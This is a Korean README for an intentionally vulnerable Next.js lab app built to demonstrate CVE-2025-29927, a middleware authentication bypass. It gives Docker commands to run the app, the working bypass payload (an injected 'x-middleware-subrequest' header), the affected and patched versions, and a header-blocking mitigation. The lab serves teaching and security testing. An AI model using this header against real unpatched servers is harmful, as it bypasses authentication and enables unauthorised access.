
CVE-2025-29927, 인증 우회에 취약한 의도적으로 만든 Next.js 앱
이 프로젝트는 Next.js 미들웨어의 인증 우회 취약점(CVE-2025-29927)에 의도적으로 취약하도록 구성된 Next.js 애플리케이션입니다. 이는 법적, 교육적, 연구 목적으로만 제공됩니다.
이 코드에 접근, 사용 또는 배포함으로써 귀하는 다음 사항을 인정하고 동의합니다:
Docker를 설치한 후 다음 명령을 실행하세요:
docker build -t next-cve-2025-29927 .
docker run -p 3000:3000 next-cve-2025-29927
브라우저에서 http://localhost:3000을 열어 결과를 확인하세요.
ZAP 또는 Burp와 같은 인터셉팅 프록시를 사용하여 요청을 캡처하고, 요청에 다음 헤더를 주입하세요:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
>= 13.0.0, < 13.5.9
>= 14.0.0, < 14.2.25
>= 15.0.0, < 15.2.3
>= 11.1.4, < 12.3.5
최신 버전으로 패치하세요
13.5.9
14.2.25
15.2.3
12.3.5
또는 업데이트할 수 없는 경우, x-middleware-subrequest 헤더가 포함된 요청을 차단하세요.
취약점에 대해 더 알아보려면 다음 리소스를 참조하세요: